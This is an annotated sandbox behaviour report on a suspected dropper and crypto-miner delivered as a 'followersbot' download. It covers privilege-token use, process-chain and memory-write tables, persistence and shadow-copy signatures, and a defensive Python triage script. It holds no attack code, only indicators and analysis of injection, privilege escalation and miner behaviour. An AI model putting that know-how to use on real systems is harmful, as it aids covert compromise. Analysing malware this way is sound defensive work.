Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A

Every row targets \REGISTRY\USER\.DEFAULT, the hive used by processes running as LocalSystem, and nearly all of them are powershell.exe / powershell.EXE creating certificate-store keys, the normal side effect of a SYSTEM-level PowerShell session touching the certificate APIs for the first time. The rows are evidence that PowerShell ran as SYSTEM, not of registry tampering in themselves. The OfficeClickToRun.exe and svchost.exe rows are background Office and OS activity.

Modifies registry class

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Windows\Explorer.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\Explorer.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\Explorer.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\Explorer.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\Explorer.EXE | N/A

All writes are ShellBag / BagMRU folder-view state by Explorer.EXE, OpenWith.exe and msedge.exe: the trace of the shell being used to browse a folder and open a file during detonation, not of the sample writing to the registry.

Opens file in notepad (likely ransom note) (tags: ransomware)

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A
(4 identical rows)

Heuristic only: the rows record four NOTEPAD.EXE launches and no file name, and nothing else in this report (no file-encryption signature, no dropped note) supports a ransomware component.

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count (consecutive identical rows collapsed, order preserved)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A 4
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A 2
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A 2
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A 1
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A 3
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A 11
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A 1
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A 3
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A 3
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A 9
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A 4
N/A N/A C:\Windows\System32\dllhost.exe N/A 8
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A 1
N/A N/A C:\Windows\System32\dllhost.exe N/A 2
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A 2
N/A N/A C:\Windows\System32\dllhost.exe N/A 2
N/A N/A C:\Windows\system32\dialer.exe N/A 4
N/A N/A C:\Windows\System32\dllhost.exe N/A 2

Order is preserved, so the table reads as an execution chain: the downloaded 9SHCODL.exe, powershell, the dropped C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe, more powershell, then dllhost.exe and dialer.exe. Process enumeration by the two sample binaries and by stock dllhost.exe and dialer.exe is what to follow up; the msedge.exe and identity_helper.exe rows are routine browser activity.

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskhostw.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeSecurityPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A

The numeric Token values are privilege LUIDs the sandbox did not resolve to names: 33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege, 36 = SeDelegateSessionUserImpersonatePrivilege (the SE_*_PRIVILEGE constants in ntseapi.h). Taken together, the powershell.exe rows cover almost every privilege held by an elevated administrator token, which is what a loop that enables every privilege present in the token produces. The rows worth following up are SeLockMemoryPrivilege in dialer.exe, a stock Windows binary with no use for locked pages (XMRig requests exactly this privilege to enable large pages for RandomX), and SeDebugPrivilege in dllhost.exe and the powershell.EXE instances, the prerequisite for opening and writing into other processes. The AUDIODG.EXE, 7zG.exe, Explorer.EXE and svchost.exe rows are routine for those binaries.

Suspicious use of FindShellTrayWindow

Description Indicator Process Target Count (consecutive identical rows collapsed, order preserved)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A 33
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A 1
N/A N/A C:\Windows\Explorer.EXE N/A 1
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A 4
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A 1

Suspicious use of SendNotifyMessage

Description Indicator Process Target Count (consecutive identical rows collapsed, order preserved)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A 24
N/A N/A C:\Windows\Explorer.EXE N/A 40

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count (consecutive identical rows collapsed, order preserved)
PID 4660 wrote to memory of 4420 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe 2
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe 40
PID 4660 wrote to memory of 1620 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe 2
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe 20

Every recorded write is from the Edge browser process (PID 4660) into one of its own child processes. Chromium's Windows sandbox broker writes into each child it launches to set it up, so this is expected browser behaviour rather than evidence of injection by the sample: no write from 9SHCODL.exe, tonbcjgtfgwe.exe, powershell.exe or dllhost.exe into another image appears in this table.
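The AdjustPrivilegeToken and WriteProcessMemory tables are easier to act on once they are parsed rather than read. The Python below is an added example written for this page, not code from the report or from any sandbox vendor: it parses rows in the shape of those two tables, resolves the numeric privilege LUIDs using the SE_*_PRIVILEGE constants from ntseapi.h, and flags high-impact privileges, enable-everything patterns and cross-image memory writes. The HIGH_IMPACT set and ENABLE_ALL_THRESHOLD are the editor's triage assumptions, and the sample rows are copies of rows from the tables above plus one constructed cross-image write (marked in the code) so that the injection branch is exercised.

```python
"""Triage helper for flattened sandbox signature rows (added example, not
report or vendor code): resolves privilege LUIDs, flags high-impact and
enable-everything privilege use, and flags cross-image WriteProcessMemory."""
import re
from collections import Counter, defaultdict
from pathlib import PureWindowsPath

# LUIDs the sandbox left unresolved; values are SE_*_PRIVILEGE constants (ntseapi.h).
LUID_NAMES = {
    33: "SeIncreaseWorkingSetPrivilege",
    34: "SeTimeZonePrivilege",
    35: "SeCreateSymbolicLinkPrivilege",
    36: "SeDelegateSessionUserImpersonatePrivilege",
}
# Editor's triage choice, not a sandbox setting: privileges worth a look whenever
# something other than a debugger, backup agent or installer enables them.
HIGH_IMPACT = {
    "SeDebugPrivilege",        # open and write any process
    "SeLockMemoryPrivilege",   # large pages; XMRig requests it for RandomX
    "SeLoadDriverPrivilege",   # kernel code
    "SeTcbPrivilege",
    "SeTakeOwnershipPrivilege",
}
ENABLE_ALL_THRESHOLD = 15  # distinct privileges; an elevated admin token has about 24

TOKEN_ROW = re.compile(r"^Token:\s+(\S+)\s+N/A\s+(.+?)\s+N/A$")
WRITE_ROW = re.compile(
    r"^PID (\d+) wrote to memory of (\d+)\s+N/A\s+(.+?\.exe)\s+(.+?\.exe)$", re.I
)


def resolve_privilege(token):
    """Map a numeric LUID to its SE_* name; pass names through unchanged."""
    if token.isdigit():
        return LUID_NAMES.get(int(token), f"LUID-{token}")
    return token


def privilege_report(lines):
    """Per image basename: privileges enabled plus the two triage flags."""
    enabled = defaultdict(set)
    for line in lines:
        m = TOKEN_ROW.match(line.strip())
        if m:
            image = PureWindowsPath(m.group(2)).name.lower()
            enabled[image].add(resolve_privilege(m.group(1)))
    return {
        name: {
            "privileges": sorted(privs),
            "high_impact": sorted(privs & HIGH_IMPACT),
            "enable_all_pattern": len(privs) >= ENABLE_ALL_THRESHOLD,
        }
        for name, privs in enabled.items()
    }


def write_report(lines):
    """Collapse WriteProcessMemory rows per (src, dst) PID pair; flag cross-image writes."""
    counts, images = Counter(), {}
    for line in lines:
        m = WRITE_ROW.match(line.strip())
        if not m:
            continue
        src, dst, src_img, dst_img = m.groups()
        key = (int(src), int(dst))
        counts[key] += 1
        images[key] = (PureWindowsPath(src_img).name.lower(),
                       PureWindowsPath(dst_img).name.lower())
    return [
        {"src_pid": s, "dst_pid": d, "writes": n,
         "cross_image": images[(s, d)][0] != images[(s, d)][1]}
        for (s, d), n in sorted(counts.items())
    ]


# Sample input: rows copied from the tables above, plus one constructed
# cross-image write (marked) so the injection branch is exercised.
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
PS = r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
PS_PRIVS = ["SeDebugPrivilege", "SeIncreaseQuotaPrivilege", "SeSecurityPrivilege",
            "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege", "SeSystemProfilePrivilege",
            "SeSystemtimePrivilege", "SeProfSingleProcessPrivilege", "SeIncBasePriorityPrivilege",
            "SeCreatePagefilePrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
            "SeShutdownPrivilege", "SeSystemEnvironmentPrivilege", "SeRemoteShutdownPrivilege",
            "SeUndockPrivilege", "SeManageVolumePrivilege", "33", "34", "35", "36"]
SAMPLE_ROWS = [
    r"Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A",
    r"Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A",
    r"Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A",
    *[f"Token: {p} N/A {PS} N/A" for p in PS_PRIVS],
    *[f"PID 4660 wrote to memory of 4420 N/A {EDGE} {EDGE}"] * 2,
    *[f"PID 4660 wrote to memory of 3752 N/A {EDGE} {EDGE}"] * 3,
    # constructed row, not from the report:
    r"PID 1234 wrote to memory of 5678 N/A C:\Sample\dropper.exe C:\Windows\System32\svchost.exe",
]

if __name__ == "__main__":
    for name, info in privilege_report(SAMPLE_ROWS).items():
        print(f"{name:16} high_impact={info['high_impact']} enable_all={info['enable_all_pattern']}")
    for w in write_report(SAMPLE_ROWS):
        print(w)
```

Run as a script it prints one verdict line per image; feed the raw rows of another report into privilege_report and write_report to triage it the same way. Because the WriteProcessMemory rows on this page are all msedge.exe to msedge.exe, write_report marks none of them cross_image; the constructed dropper.exe to svchost.exe row is the only one flagged, and dialer.exe and dllhost.exe are the only stock binaries that come out with a high-impact privilege.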

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

